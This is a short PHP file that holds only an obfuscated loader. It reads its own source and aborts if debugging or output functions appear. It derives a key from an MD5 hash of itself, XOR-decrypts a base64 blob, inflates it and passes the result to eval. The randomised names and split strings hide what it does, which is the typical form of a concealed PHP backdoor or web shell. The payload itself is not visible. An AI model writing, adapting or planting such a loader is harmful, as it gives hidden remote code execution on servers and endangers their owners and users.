<?php
$ollluk="65da8ede3daf3e442bb68864b20c1f8c";
$qmsnrribu="000c00585c5006030b50535651575656565b00070d5b02045503095b03510c00";
$hodpqzlutkgm="S6uFU6cVduNncZYgYW9Tu94sKDtO4MkvlO3/48aFnCI7ZF/Pir4rVSB5yf8Ryl68x/duWVFmf258YZExoAKvSrF+B5r/GMfy6Z5YAnKvHhaqYaFItYdccdKd04lnWFyb3M6Q+1LRWaPnmHDW0kYPYqNjr73oWlA9D1HZRZn+BbgwPvp4yaWiSUCDj5zVifQIgSZUkeHTIoMPz6XDHLWTnBe2BULQY1fociClfhGsLRNaYeEmhQxOsxRW9D0p3euDQL71IwpRrNV9wgB1ZOBKmpfqKHsryv2I8aMwZsJSorywNcYj0DWFhhyMNALe6pJeIkIv0MXEAIh4PWheoJBpedug/Kyy2cscd5TYXoZmAZCls+D4oR5rreGMlTdiQodc8Fga12FRlWWKFdLaLyhOa46ILwtkOpUfKgS4lCPKwynhhg==";
$apwxfrq=file_get_contents(__FILE__);
$koznjapy=str_replace($hodpqzlutkgm,"",$apwxfrq);
if(strpos($koznjapy,"ec"."ho")!==false||strpos($koznjapy,"pr"."int")!==false||strpos($koznjapy,"var_"."dump")!==false||strpos($koznjapy,"file_put_"."contents")!==false||strpos($koznjapy,"fw"."rite")!==false){die();}
$brlctnr=str_replace(array($ollluk,$qmsnrribu),array("SP_d82f4109","KP_9d00471e"),$apwxfrq);
$nnxlhuhsqd=md5($brlctnr);
$asyieoi=hex2bin($qmsnrribu);
$olqwfsbvc="";
$uonetkpi=strlen($nnxlhuhsqd);
for($ldexlownsrmy=0;$ldexlownsrmy<$uonetkpi;$ldexlownsrmy++){
    $olqwfsbvc.=chr(ord($asyieoi[$ldexlownsrmy])^ord($nnxlhuhsqd[$ldexlownsrmy]));
}
$kifybqdyhbcq=base64_decode($hodpqzlutkgm);
$piysvffanvyf=strlen($kifybqdyhbcq);
$xcydrohiqri="";
$xoznqfdxga=strlen($olqwfsbvc);
for($ldexlownsrmy=0;$ldexlownsrmy<$piysvffanvyf;$ldexlownsrmy++){
    $xcydrohiqri.=$kifybqdyhbcq[$ldexlownsrmy]^$olqwfsbvc[$ldexlownsrmy%$xoznqfdxga];
}
$vqdepoxf="gz"."in"."fl"."ate";
eval($vqdepoxf($xcydrohiqri));
